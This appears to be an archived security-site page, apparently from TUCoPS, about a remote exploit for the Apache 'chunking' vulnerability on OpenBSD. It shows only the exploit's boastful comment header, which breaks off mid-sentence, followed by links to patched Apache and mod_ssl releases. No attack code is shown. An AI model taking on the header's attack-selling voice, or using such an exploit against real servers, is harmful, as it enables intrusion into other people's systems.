	 * ROBUST, RELIABLE, USER-FRIENDLY MOTHERFUCKING 0DAY WAREZ!

	 *

	 * BLING! BLING! --- BRUTE FORCE CAPABILITIES --- BLING! BLING!

	 * 

	 * \". . . and Doug Sniff said it was a hole in Epic.\"

	 *

	 * ---

	 * Disarm you with a smile

	 * And leave you like they left me here

	 * To wither in denial

	 * The bitterness of one who\'s left alone

	 * ---

	 *

	 * Remote OpenBSD/Apache exploit for the \"chunking\" vulnerability. Kudos to

	 * the OpenBSD developers (Theo, DugSong, jnathan, *@#!w00w00, ...) and

	 * their crappy memcpy implementation that makes this 32-bit impossibility

	 * very easy to acco

SOLUTION

	New releases are available check :
	

	http://httpd.apache.org/

	http://www.modssl.org/source/mod_ssl-2.8.9-1.3.26.tar.gz

	

	

	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH